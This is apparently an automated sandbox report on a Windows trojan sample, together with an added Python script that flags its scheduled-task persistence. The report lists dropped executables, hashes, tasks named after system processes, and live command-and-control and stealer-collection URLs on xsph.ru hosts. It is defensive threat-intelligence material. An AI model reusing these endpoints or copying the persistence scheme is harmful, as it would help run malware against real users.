Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1581448 | Sample: rWjaZEKha8.exe | Start date: 27/12/2024 | Architecture: WINDOWS | Score: 100
(numbers after a process name are the graph's node counters: created registry values, created files)

Top-level signatures: Found malware configuration; Antivirus detection for URL or domain; Antivirus detection for dropped file; 11 other signatures
DNS/IP: a1067345.xsph.ru, 141.8.197.42, ports 49730, 49732, 80, SPRINTHOSTRU, Russian Federation (contacted by Idle.exe)

Process tree:
rWjaZEKha8.exe 3 6 (started)
    dropped: C:\bridgehyperperfdhcp\intoDhcp.exe (PE32); C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe (data)
    wscript.exe 1 (started)
        signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
        cmd.exe 1 (started)
            intoDhcp.exe 3 26 (started)
                dropped: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe (PE32); C:\Users\user\OjTEkrTlLyhdt.exe (PE32); C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe (PE32); 8 other malicious files
                signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 3 other signatures
                cmd.exe (started)
                    conhost.exe (started)
                schtasks.exe (started)
                schtasks.exe (started)
                31 other processes
            conhost.exe (started)
OjTEkrTlLyhdt.exe (started)
    signature: Multi AV Scanner detection for dropped file
Idle.exe 14 2 (started)
    network: a1067345.xsph.ru 141.8.197.42, ports 49730, 49732, 80
2 other processes

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
rWjaZEKha8.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby
rWjaZEKha8.exe | 100% | Avira | VBS/Runner.VPG
rWjaZEKha8.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | 100% | Avira | HEUR/AGEN.1323984
C:\bridgehyperperfdhcp\intoDhcp.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\GoElC7XtGN.bat | 100% | Avira | BAT/Delbat.C
C:\Program Files (x86)\Microsoft Office\dasHost.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | 100% | Avira | HEUR/AGEN.1323984
C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe | 100% | Avira | VBS/Runner.VPG
C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files\Windows Portable Devices\upfc.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files\Windows Portable Devices\Idle.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | 100% | Joe Sandbox ML |
C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | 100% | Joe Sandbox ML |
C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | 100% | Joe Sandbox ML |
C:\bridgehyperperfdhcp\intoDhcp.exe | 100% | Joe Sandbox ML |
C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Microsoft Office\dasHost.exe | 100% | Joe Sandbox ML |
C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exe | 100% | Joe Sandbox ML |
C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | 100% | Joe Sandbox ML |
C:\Program Files\Windows Portable Devices\upfc.exe | 100% | Joe Sandbox ML |
C:\Program Files\Windows Portable Devices\Idle.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Microsoft Office\dasHost.exe | 76% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exe | 76% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | 76% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe | 76% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\Windows Portable Devices\Idle.exe | 76% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe | 76% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\Windows Portable Devices\upfc.exe | 76% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe | 76% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Users\user\OjTEkrTlLyhdt.exe | 76% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe | 76% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\bridgehyperperfdhcp\intoDhcp.exe | 76% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://a1067345.xsph.ru/ | 100% | Avira URL Cloud | malware
http://a1067345.xsph.ru/L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ | 100% | Avira URL Cloud | malware
http://a1067345.xsph.ru | 100% | Avira URL Cloud | malware
http://a1067345.xsph.ru/L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839e | 100% | Avira URL Cloud | malware

Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
a1067345.xsph.ru | 141.8.197.42 | true | false | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://a1067345.xsph.ru/L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ | false | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://a1067345.xsph.ru | Idle.exe, 00000015.00000002.1857787065.00000000027D8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1857787065.00000000027D0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://a1067345.xsph.ru/L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839e | Idle.exe, 00000015.00000002.1857787065.00000000027AF000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1857787065.00000000027D8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1867010896.000000001B7B5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | intoDhcp.exe, 00000004.00000002.1750999526.0000000003644000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1857787065.00000000027AF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://a1067345.xsph.ru/ | Idle.exe, 00000015.00000002.1857787065.00000000027A3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown

Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
141.8.197.42 | a1067345.xsph.ru | Russian Federation | 35278 | SPRINTHOSTRU | false
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1581448
                Start date and time:2024-12-27 18:31:06 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 57s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:44
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:rWjaZEKha8.exe
                renamed because original name is a hash value
                Original Sample Name:5D579285E5EFDF6DE25DA8D83D7AA9BE.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@51/28@1/1
                EGA Information:
                • Successful, ratio: 16.7%
                HCA Information:
                • Successful, ratio: 60%
                • Number of executed functions: 446
                • Number of non-executed functions: 93
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target Idle.exe, PID 8136 because it is empty
                • Execution Graph export aborted for target Idle.exe, PID 8168 because it is empty
                • Execution Graph export aborted for target OjTEkrTlLyhdt.exe, PID 3060 because it is empty
                • Execution Graph export aborted for target OjTEkrTlLyhdt.exe, PID 7232 because it is empty
                • Execution Graph export aborted for target intoDhcp.exe, PID 7860 because it is empty
                • Not all processes were analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: rWjaZEKha8.exe
                Time | Type | Description
                12:32:14 | API Interceptor | 15x Sleep call for process: Idle.exe modified
                17:32:03 | Task Scheduler | Run new task: Idle path: "C:\Program Files\Windows Portable Devices\Idle.exe"
                17:32:03 | Task Scheduler | Run new task: IdleI path: "C:\Program Files\Windows Portable Devices\Idle.exe"
                17:32:03 | Task Scheduler | Run new task: OjTEkrTlLyhdt path: "C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe"
                17:32:04 | Task Scheduler | Run new task: OjTEkrTlLyhdtO path: "C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe"
                17:32:06 | Task Scheduler | Run new task: dasHost path: "C:\Program Files (x86)\microsoft office\dasHost.exe"
                17:32:06 | Task Scheduler | Run new task: dasHostd path: "C:\Program Files (x86)\microsoft office\dasHost.exe"
                17:32:07 | Task Scheduler | Run new task: TextInputHost path: "C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe"
                17:32:07 | Task Scheduler | Run new task: TextInputHostT path: "C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe"
                17:32:07 | Task Scheduler | Run new task: upfc path: "C:\Program Files\Windows Portable Devices\upfc.exe"
                17:32:07 | Task Scheduler | Run new task: upfcu path: "C:\Program Files\Windows Portable Devices\upfc.exe"
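The ten Task Scheduler rows above show two traits worth turning into a repeatable check on any host's task inventory: every task image carries the name of a Windows system process (dasHost.exe, TextInputHost.exe, upfc.exe, and "Idle", the display name of the System Idle Process) but lives under Program Files or a top-level folder instead of C:\Windows, and every task is registered twice, the second name being the first with its own initial appended, both pointing at the same binary. The Python below is an added worked example, not part of the Joe Sandbox report or of any Joe Sandbox tooling. It parses the report's own "Run new task" rows (copied here as constructed input) and applies both checks. The set of system-like image names, the trusted root prefix, and the two benign control tasks are assumptions chosen for this example.

```python
"""Added example: flag scheduled-task persistence traits seen in the report above.

Two checks over (task name, image path) pairs:
  1. an image named like a Windows system process outside C:\\Windows
  2. task names registered in pairs, NAME and NAME + NAME[0], same image
"""
import re
from pathlib import PureWindowsPath

# Constructed input: the "Task Scheduler" rows of the report's behaviour timeline,
# with the task names and image paths exactly as the report lists them.
REPORT_TIMELINE = r"""
17:32:03 | Task Scheduler | Run new task: Idle path: "C:\Program Files\Windows Portable Devices\Idle.exe"
17:32:03 | Task Scheduler | Run new task: IdleI path: "C:\Program Files\Windows Portable Devices\Idle.exe"
17:32:03 | Task Scheduler | Run new task: OjTEkrTlLyhdt path: "C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe"
17:32:04 | Task Scheduler | Run new task: OjTEkrTlLyhdtO path: "C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe"
17:32:06 | Task Scheduler | Run new task: dasHost path: "C:\Program Files (x86)\microsoft office\dasHost.exe"
17:32:06 | Task Scheduler | Run new task: dasHostd path: "C:\Program Files (x86)\microsoft office\dasHost.exe"
17:32:07 | Task Scheduler | Run new task: TextInputHost path: "C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe"
17:32:07 | Task Scheduler | Run new task: TextInputHostT path: "C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe"
17:32:07 | Task Scheduler | Run new task: upfc path: "C:\Program Files\Windows Portable Devices\upfc.exe"
17:32:07 | Task Scheduler | Run new task: upfcu path: "C:\Program Files\Windows Portable Devices\upfc.exe"
"""

# Constructed benign rows so both checks have something to pass.
BENIGN_CONTROLS = [
    ("Microsoft Compatibility Appraiser", r"C:\Windows\System32\compattelrunner.exe"),
    ("GoogleUpdateTaskMachineUA", r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"),
]

# Assumption for this example: image names Windows itself uses. Real System32 /
# SystemApps binaries plus "Idle", which mimics the System Idle Process and never
# exists as a file. Replace with an inventory taken from your own golden image.
SYSTEM_LOOKALIKE_NAMES = {
    "idle.exe", "dashost.exe", "textinputhost.exe", "upfc.exe",
    "svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "services.exe",
    "smss.exe", "wininit.exe", "taskhostw.exe", "runtimebroker.exe",
}
# Assumption: the only root under which those names are legitimate.
TRUSTED_PREFIXES = ("c:\\windows\\",)

TASK_RE = re.compile(r'Run new task: (?P<name>\S+) path: "(?P<path>[^"]+)"')


def parse_task_rows(text):
    """Extract (task name, image path) pairs from 'Run new task' timeline rows."""
    return [(m.group("name"), m.group("path")) for m in TASK_RE.finditer(text)]


def masquerading_tasks(tasks):
    """Tasks whose image has a system-process name but lives outside C:\\Windows."""
    hits = []
    for name, path in tasks:
        image = PureWindowsPath(path)
        outside = not str(image).lower().startswith(TRUSTED_PREFIXES)
        if image.name.lower() in SYSTEM_LOOKALIKE_NAMES and outside:
            hits.append((name, path))
    return hits


def paired_tasks(tasks):
    """(NAME, NAME + NAME[0], path) triples where both tasks run the same image."""
    by_name = {name: path for name, path in tasks}
    pairs = []
    for name, path in tasks:
        twin = name + name[0]
        if twin in by_name and by_name[twin] == path:
            pairs.append((name, twin, path))
    return pairs


def triage(tasks):
    """Summarise both checks plus the distinct images behind all tasks."""
    return {
        "masquerading": masquerading_tasks(tasks),
        "paired_names": paired_tasks(tasks),
        "distinct_images": sorted({path for _, path in tasks}),
    }


if __name__ == "__main__":
    rows = parse_task_rows(REPORT_TIMELINE) + BENIGN_CONTROLS
    result = triage(rows)
    for name, path in result["masquerading"]:
        print(f"[masquerade] task {name!r} runs a system-named image outside C:\\Windows: {path}")
    for first, twin, path in result["paired_names"]:
        print(f"[pair] tasks {first!r} and {twin!r} both run {path}")
    print(f"{len(rows)} tasks point at {len(result['distinct_images'])} distinct images")
```

On the report's rows the first check fires on the eight Idle, dasHost, TextInputHost and upfc tasks and ignores the two OjTEkrTlLyhdt tasks (an invented name, caught only by the pairing check); the second check reports all five pairs. Feeding real hosts means exporting the task inventory (for example from `schtasks /query /v /fo csv`) into the same (name, path) shape.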
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                141.8.197.42 | 01US71QGnu.exe | malicious | Unknown
                • a1023269.xsph.ru/yhjjk.exe
                | 01US71QGnu.exe | malicious | Unknown
                • a1023269.xsph.ru/yhjjk.exe
                | LisectAVT_2403002A_442.exe | malicious | DCRat
                • a0583448.xsph.ru/HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN
                | PMDfwr7Jal.exe | malicious | DCRat
                • a0583448.xsph.ru/HttpCpu.php?Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp
                | quotation.doc | malicious | Unknown
                • a0862680.xsph.ru/djlipantro2.1.exe
                | HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe | malicious | BlackNET
                • f0575824.xsph.ru/blacknet/receive.php?command=VW5pbnN0YWxs&vicID=SGFjS2VkXzdGOTRDM0I1
                | 442.111).lnk | malicious | Unknown
                • a0705880.xsph.ru/selection/seedling.txt
                | htmlayout.dll | malicious | Unknown
                • a0747694.xsph.ru/serv.php
                | qRsw2oZH24.exe | malicious | Panda Stealer
                • crimestreetsru.ru.xsph.ru/collect.php
                | svchost.exe | malicious | Panda Stealer
                • asdqwezxc.ru.xsph.ru/collect.php
                No context
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                SPRINTHOSTRU | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc
                • 185.185.71.170
                | aweqG2ssAY.exe | malicious | Clipboard Hijacker, Cryptbot
                • 185.185.71.170
                | vOizfcQSGf.exe | malicious | Clipboard Hijacker, Cryptbot
                • 185.185.71.170
                | EnoSY3z6MP.exe | malicious | Cryptbot
                • 185.185.71.170
                | vH7JfdNi3c.exe | malicious | Clipboard Hijacker, Cryptbot
                • 185.185.71.170
                | U6mwWZlkzH.exe | malicious | Clipboard Hijacker, Cryptbot
                • 185.185.71.170
                | KzLv0EXDs1.exe | malicious | Clipboard Hijacker, Cryptbot
                • 185.185.71.170
                | JiZQEd33mn.exe | malicious | Unknown
                • 185.185.71.170
                | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc
                • 185.185.71.170
                | SAc3W2GkMS.exe | malicious | Cryptbot
                • 185.185.71.170
                No context
                No context
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with very long lines (560), with no line terminators
                Category:dropped
                Size (bytes):560
                Entropy (8bit):5.8681403265010275
                Encrypted:false
                SSDEEP:6:OjzEcgA/cyOcR1vRRU0sXl3MQB2oxJEWxY0JPQgjcEb09Adbe2xp2fdDZwKQTbmL:OjRZU7oUFfBJPfbDbWBGzPm/AsMeX
                MD5:7CFB039E41A179275967CF71C34B7118
                SHA1:4E8EE725A3BC41B256863F529F79E370152ABB77
                SHA-256:0A77CC9366571ACD0DD343215067864EC646ED4C4724A2A456DCEAF085055175
                SHA-512:017099A3B42550053E3CCC1D955A7F679763E9CE7BBD966591D9CCDA5FEFA9C347005A61EFE379D4C5817ECC3A202B48CC440B53F6F3F7B676F57E150EDCAE64
                Malicious:false
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):75
                Entropy (8bit):5.3452898570760095
                Encrypted:false
                SSDEEP:3:BnSFiJ711LebxOkcjxpbJCV:0FqR1LeN+jxpe
                MD5:83521C1F32D58A77972AAFF0F25E8E72
                SHA1:44CC9D88CF42410026FCDECCAFBF51E9FD8FE808
                SHA-256:F3DCA97E25C51BF85D58AD4F96FD787A17AFBB24CCFA544CD5176D66CFF83035
                SHA-512:A030F4E86FDD7601E27312BD0453A52267C26B7F91CB55EDBFFD945262A2922A81579DECB81570BAD04BCE32323109B2E566E9C2E31A2369D88A2077C839A330
                Malicious:false
                Preview:2J33UYxB7zHGl4SKljC7ftEc8JbnA2dL4HwA1nEm940eN9VMURmxJdiIFb4L6JBEW5MeIRT8eZ8
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):80
                Entropy (8bit):5.340311532225103
                Encrypted:false
                SSDEEP:3:ZyhcSxY/tcM9XWnO0mFK6HtSXlq:8cn/tvdWnO9PHt+q
                MD5:C283D9F52748D33F68CBEF4A74044988
                SHA1:6999AB86A32B0045891FAE293690923FB2809FE1
                SHA-256:97AE105F5AC067BECC5B5CB1F67D5A766AA13A5C160DF27EFC6AEF8DB7985D65
                SHA-512:6672745F5749EA8507E8DEED212C16BA6832584C0437CA203D3BAC774B243F45CB027974011B55C8D570DF7FC4B7057C39FCFA8DD556073C36CDB7A373A32A98
                Malicious:false
                Preview:K3uBDCmcxGi8pz7TKKuPxHEyhZ2X9ToQajJTHxMDQ62cRJUNq1dHXJQCz6doKPddbSiGqoLW7r91OmhY
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with very long lines (428), with no line terminators
                Category:dropped
                Size (bytes):428
                Entropy (8bit):5.877941919115159
                Encrypted:false
                SSDEEP:6:6sck8HHGj/JQnfl4RA29lHphSFyYfjIcRLKcXhYmsv2izk9DcVe1mAOVzufmY5fo:LckbnRtpD8j/nhYmi5z8UrZdX
                MD5:8A2C7151ABE6BE91FECA6B2DBEF5BCD8
                SHA1:80DF2B644621623256FFBA42D6DACB85D4BBFC8B
                SHA-256:A052A8952AC5758FA1DB320A6520E770A572BBDF90BCF2C92096F9929C668BA7
                SHA-512:3BF4AF9B8935B38CBF2F3B9A3FABAADA7600FEB1556BCECC0A7EDB8BA580EC3C281C14F532139853C6F542EBD4DCC2FAB1246A0C7AA2B2730BDA01C06DAF26EB
                Malicious:false
